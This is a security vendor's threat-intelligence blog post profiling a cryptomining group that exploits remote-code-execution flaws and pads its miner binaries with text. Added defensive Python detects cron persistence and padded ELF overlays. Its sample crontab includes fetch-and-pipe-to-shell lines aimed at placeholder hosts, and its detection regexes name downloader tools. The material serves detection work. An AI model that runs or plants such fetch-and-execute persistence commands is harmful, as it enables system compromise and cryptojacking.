Threat Activity Cluster #1: Mint
This blog was originally published by Alert Logic on March 22, 2022.
Before diving into this first Ice Cream activity cluster, be sure to read the series introduction here.
Our first activity cluster is known as Mint.
This flavor of attackers uses remote code execution (RCE) exploits against Linux machines to upload cryptocurrency miners to the compromised systems. They are a very active actor, often first to the scene when a 0-day RCE emerges, and tracking the group has given us early warning of these emerging exploits.
This blog is the culmination of years of work conducted by numerous individuals across global threat intelligence and SOC teams.
Mint’s actions had been observed previously, but Alert Logic first started paying close attention to them as a threat group at the beginning of January 2020, when they began a campaign exploiting CVE-2019-19781, a vulnerability discovered in the Citrix Application Delivery Controller (ADC) and Citrix Gateway. It allowed an attacker to execute code remotely without any precursors, such as authenticating to the system.
Unauthenticated RCEs are always the most serious of vulnerabilities, as they grant an attacker control over a system within seconds, with no prerequisites required.
The vulnerability was on the radar of our researchers and threat hunters when it was announced on December 17, 2019. As a result, wideband telemetry signatures were deployed and flagged as a candidate for hunts. Like all wideband hunting telemetry, they captured an excessive amount of benign information as the net is cast wide. These signatures captured network data (full payload capture), so SOC threat experts (TSX) could sift through the requests and responses to identify the exploit. This creates a feedback loop that allows threat researchers to refine the telemetry signatures.
Initial reviews of these signatures did not yield any results. It was only after January 10, 2020, when a PoC became publicly available, that we started seeing customers targeted with the exploit. This is a common pattern: initially few know the specific method to successfully exploit a vulnerability, even though both attackers and defenders may be aware that the vulnerability exists. Once a PoC is public, malicious actors use its exploit string and create derivatives of it to evade detection or prevention.
The Mint Ice Cream flavor was first confirmed when a threat hunter identified a malware dropper with a naming convention related to the Citrix RCE, following a two-character “XX.sh” naming formula. It was then verified that the infected machine was a Citrix ADC. The dropper killed any miners already present, set up persistence via cron jobs, and then dropped an Executable and Linkable Format (ELF) binary to begin mining cryptocurrency (an XMRig miner).
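The dropper behaviour described above (a fetched two-character “XX.sh” script and cron-based persistence) is something a defender can look for in crontab contents. The Python below is an added example, not code from Alert Logic or from the campaign: it scans constructed crontab lines (the hosts are TEST-NET documentation addresses and the script names are made up to match the post’s naming formula) and flags entries that pipe a downloader straight into a shell or reference a two-character `.sh` script.

```python
import re

# Constructed sample crontab, not real indicators from the post: the two
# remote hosts are TEST-NET documentation addresses and the script names
# follow the two-character "XX.sh" pattern the post describes.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /opt/monitoring/agent --check
* * * * * curl -fsSL http://198.51.100.23/xx.sh | sh
@reboot wget -q -O- http://203.0.113.9/aa.sh | bash > /dev/null 2>&1
30 1 * * 0 /home/app/backup.sh
"""

# A downloader (curl/wget) whose output is piped straight into a shell.
FETCH_PIPED_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|;]*\|\s*(?:ba|da|z|k)?sh\b")

# A script whose basename is exactly two alphanumerics followed by ".sh".
TWO_CHAR_SH = re.compile(r"(?:^|[/\s])[A-Za-z0-9]{2}\.sh\b")


def scan_crontab(text: str) -> list[dict]:
    """Return one finding per suspicious crontab entry.

    Each finding carries the 1-based line number, the raw entry and the
    list of reasons that fired; comment and blank lines are skipped.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        reasons = []
        if FETCH_PIPED_TO_SHELL.search(entry):
            reasons.append("remote script fetched and piped into a shell")
        if TWO_CHAR_SH.search(entry):
            reasons.append("two-character .sh script name")
        if reasons:
            findings.append({"line": lineno, "entry": entry, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {f['entry']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

Run against the sample, the logrotate, monitoring and backup entries pass and the two fetch-and-execute entries are reported with both reasons. The two-character name check is deliberately narrow; the pipe-to-shell check is the more durable of the two, since it describes the persistence mechanism rather than one campaign’s naming habit.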
We observed similar activity in April 2020 as part of the SaltStack campaign, although an interesting new tactic was discovered once access had been gained using the SaltStack RCE.
Mint TTP Evolution
Attackers evolve as they attempt to evade security controls, and interestingly, in the SaltStack campaign, the ELF contained the whole of Shakespeare’s Hamlet amongst the code. While fun, the Shakespearean tragedy likely served as padding: analytical tools would see the file as predominantly benign, as the majority of it was non-executable text. This meant that tools which flag or block based on the percentage of malicious content identified would not be confident enough to block the file. Considering their goal, it is no wonder they chose Shakespeare’s longest play.
“Though this be madness, yet there is method in’t.”
– Hamlet Act 2, Scene 2, 193-206
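The padding trick is a reason not to score a file by the percentage of its bytes that look malicious. The Python below is an added example, not code from Alert Logic or from the campaign: it builds a constructed little-endian ELF64 with one loadable segment, appends a repeated text excerpt after the last byte any header references (the way the post describes Hamlet being padded into the miner), and then measures how much of the file sits outside the ELF structure (the overlay) and how much of that overlay is printable text. The sample bytes and the thresholds are constructed for illustration; the header parsing follows the standard ELF64 layouts.

```python
import struct

# Constructed sample input, not a file from the campaign: a text excerpt is
# appended after the last byte any ELF header refers to, the way the post
# describes Hamlet being padded into the miner.
PADDING = b"Though this be madness, yet there is method in't.\n" * 200

# Bytes treated as printable text: 0x20..0x7e plus tab, LF and CR.
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}

SHT_NOBITS = 8  # section type that occupies no bytes in the file


def build_sample(pad: bool) -> bytes:
    """Build a minimal little-endian ELF64 with one PT_LOAD segment.

    The segment covers the headers and a small placeholder code blob; when
    `pad` is set the constructed text is appended as an overlay.
    """
    code = b"\x48\x31\xc0\xc3" * 8          # placeholder: xor rax,rax; ret
    mapped = 64 + 56 + len(code)             # ELF header + 1 phdr + code
    e_ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    ehdr = e_ident + struct.pack(
        "<HHIQQQIHHHHHH",
        2, 0x3E, 1,        # ET_EXEC, EM_X86_64, EV_CURRENT
        0x400000 + 120,    # e_entry: start of the code blob
        64, 0, 0,          # e_phoff, e_shoff (no sections), e_flags
        64, 56, 1,         # e_ehsize, e_phentsize, e_phnum
        64, 0, 0,          # e_shentsize, e_shnum, e_shstrndx
    )
    phdr = struct.pack(
        "<IIQQQQQQ",
        1, 5,              # PT_LOAD, PF_R | PF_X
        0, 0x400000, 0x400000,
        mapped, mapped, 0x1000,
    )
    data = ehdr + phdr + code
    return data + PADDING if pad else data


def referenced_end(data: bytes) -> int:
    """Highest file offset referenced by the ELF header, segments and sections."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("this example handles little-endian ELF64 only")
    (_, _, _, _, e_phoff, e_shoff, _, e_ehsize, e_phentsize, e_phnum,
     e_shentsize, e_shnum, _) = struct.unpack_from("<HHIQQQIHHHHHH", data, 16)
    end = e_ehsize
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        _, _, p_offset, _, _, p_filesz, _, _ = struct.unpack_from("<IIQQQQQQ", data, off)
        end = max(end, off + e_phentsize, p_offset + p_filesz)
    if e_shnum:
        end = max(end, e_shoff + e_shnum * e_shentsize)
        for i in range(e_shnum):
            off = e_shoff + i * e_shentsize
            _, sh_type, _, _, sh_offset, sh_size = struct.unpack_from("<IIQQQQ", data, off)
            if sh_type != SHT_NOBITS:   # NOBITS sections take no file space
                end = max(end, sh_offset + sh_size)
    return min(end, len(data))


def printable_ratio(buf: bytes) -> float:
    return sum(b in PRINTABLE for b in buf) / len(buf) if buf else 0.0


def analyze(data: bytes) -> dict:
    """Compare what the ELF structure accounts for against the whole file."""
    end = referenced_end(data)
    overlay = data[end:]
    return {
        "file_size": len(data),
        "referenced_end": end,
        "overlay_bytes": len(overlay),
        "overlay_fraction": len(overlay) / len(data),
        "overlay_printable": printable_ratio(overlay),
        "whole_file_printable": printable_ratio(data),
    }


def is_text_padded(report: dict, min_fraction=0.5, min_printable=0.9) -> bool:
    """Flag a file where most bytes sit outside the ELF structure and read as text."""
    return (report["overlay_fraction"] >= min_fraction
            and report["overlay_printable"] >= min_printable)


if __name__ == "__main__":
    for label, sample in (("clean", build_sample(False)), ("padded", build_sample(True))):
        report = analyze(sample)
        print(label, report, "text-padded" if is_text_padded(report) else "ok")
```

The point of the split is that the whole-file printable ratio is what a percentage-based scorer sees, and padding drives it towards "benign"; the overlay fraction moves the other way, because appended text is bytes that no segment or section claims. A large, almost entirely printable overlay is therefore a signal in its own right rather than a dilution of the verdict.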
The tactical evolution became part of the Mint strategy. It was observed again in October 2020 when the Oracle WebLogic RCE was discovered, and again in August 2021, exploiting the Atlassian Confluence flaw.
The activity that we have observed involves Russian IP addresses throughout, with IP addresses associated with former Soviet states involved in the installation phases. While this information is helpful for tracking and hunting activity related to the flavor, it is important to emphasize that this is not attribution to a nation, as IP addresses can be easily spoofed.
Their overall objective has been to install crypto miners onto vulnerable systems, hijacking their compute power to provide a steady stream of cryptocurrency to the attackers’ wallets. We have referred to the ELF file internally as a GO-LNG Miner; however, it is widely known as Kinsing in the security community.
Mint continues to look for the latest RCE vulnerability to gain initial access. More recently, at the end of 2021 into 2022, this flavor was very active during the Log4j saga, attempting to capitalize on the abundance of Java-based applications likely to have been bundled with the vulnerable open source logging module. Mint was also observed exploiting CVE-2022-29464, the unauthenticated arbitrary file upload vulnerability present in WSO2 products.
Although Mint capitalizes on the latest exploit, hoping to catch vulnerable systems before the next patch cycle, and has shown it can adapt TTPs and infrastructure when necessary, elements of its subsequent techniques and actions are consistent. The same two mining configurations have been observed throughout, alongside other common methods and indicators in the C2, installation, and actions-on-objectives phases, allowing us to confidently cluster the activity under the flavor Mint.
Our understanding and routine tracking of this threat activity has facilitated numerous detections and remediation plans for customers targeted by this group.
All shared intelligence on Mint can be found at the bottom of this page. Happy hunting.
Continue with the rest of the series by clicking the links below:
- Cluster 2: Mint Sprinkles
- Cluster 3: Strawberry
- Cluster 4: Strawberry Sprinkles
- Cluster 5: Pistachio
About the Authors
Josh Davies is a Product Manager at Alert Logic by HelpSystems. Formerly a Security Analyst and Solutions Architect, Josh has extensive experience working with mid-market and enterprise organisations; conducting incident response and threat hunting activities as an analyst before working with organisations to identify appropriate security solutions for challenges across cloud, on-premises and hybrid environments.
Gareth Protheroe is a SANS-certified (GCTI) senior security analyst at Alert Logic by HelpSystems. Gareth has a background in chemical science and currently spearheads Alert Logic’s threat hunting activities conducted by the SOC and threat intelligence teams.